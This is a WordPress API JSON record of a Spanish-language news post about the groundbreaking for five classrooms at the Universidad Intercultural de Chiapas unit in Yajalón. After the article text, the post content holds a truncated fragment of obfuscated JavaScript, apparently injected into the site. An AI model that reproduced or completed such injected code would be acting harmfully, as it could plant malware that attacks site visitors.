{"id":12597,"date":"2023-11-14T01:17:48","date_gmt":"2023-11-14T01:17:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=12597"},"modified":"2023-11-14T01:17:49","modified_gmt":"2023-11-14T01:17:49","slug":"inicia-la-construccion-de-aulas-en-la-unich-de-yajalon","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=12597","title":{"rendered":"Inicia la construcci\u00f3n de aulas en la UNICH de Yajal\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG_20231113_103413-1024x577.jpg\" alt=\"\" class=\"wp-image-12598\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG_20231113_103413-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG_20231113_103413-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG_20231113_103413-768x433.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG_20231113_103413-1536x866.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/11\/IMG_20231113_103413-2048x1155.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal 13 de Noviembre del 2023. Yajal\u00f3n.- El rector de la Universidad Intercultural de Chiapas (UNICH) Dionicio Toledo Hern\u00e1ndez, acompa\u00f1ado de autoridades del municipio de Yajal\u00f3n, representantes del Inifech, y Representantes del Icatech Yajal\u00f3n, picieron la Primera Piedra de lo que ser\u00e1n las nuevas aulas de la Unidad Acad\u00e9mica Multidisciplinaria de Yajal\u00f3n, de la Universidad Intercultural de Chiapas (Unich).&#8221;Con el Gobierno de la Cuarta Transformaci\u00f3n, se ha impulsado mucho a la Educaci\u00f3n desde nivel b\u00e1sico hasta nivel superior, una muestra es \u00e9sta obra que se est\u00e1 construyendo en esta Unidad Acad\u00e9mica Multidisciplinaria de Yajal\u00f3n, con la contrucci\u00f3n de 5 aulas, que van a ser espacios dignos para el aprendizaje, para compartir experiencias, pero sobre todo de un ambiente sano de convivencia, y que podamos generar, procesos de desarrollo en la regi\u00f3n&#8221;, dijo en su intervenci\u00f3n.Record\u00f3 que la Unich, se creo por las demandas a\u00f1ejas de contar con una educaci\u00f3n Intercultural en las regiones m\u00e1s necesitadas &#8220;donde contamos con un gran n\u00famero de j\u00f3venes que requieren estudiar alguna Licenciatura, ah\u00ed es donde la universidad tiene sedes y espacio, lugares m\u00e1s olvidadas a lo largo de la historia de la educaci\u00f3n superior&#8221;.Est\u00e1 obra es parte del Programa Fondo de Aportaciones M\u00faltiples (FAM) Ejercicio Fiscal 2023, y en esta Primera etapa de construcci\u00f3n se considera el edificio 01 para 05 aulas did\u00e1cticas y una obra exterior de techo para andador.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 13 de Noviembre del 2023. Yajal\u00f3n.- El rector de la Universidad Intercultural de Chiapas (UNICH) Dionicio Toledo Hern\u00e1ndez, acompa\u00f1ado de autoridades del municipio de Yajal\u00f3n, representantes del Inifech, y Representantes del Icatech Yajal\u00f3n, picieron la Primera Piedra de lo que ser\u00e1n las nuevas aulas de la Unidad Acad\u00e9mica Multidisciplinaria de Yajal\u00f3n, de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":12598,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-12597","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12597","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=12597"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12597\/revisions"}],"predecessor-version":[{"id":12599,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/12597\/revisions\/12599"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/12598"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=12597"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=12597"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=12597"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}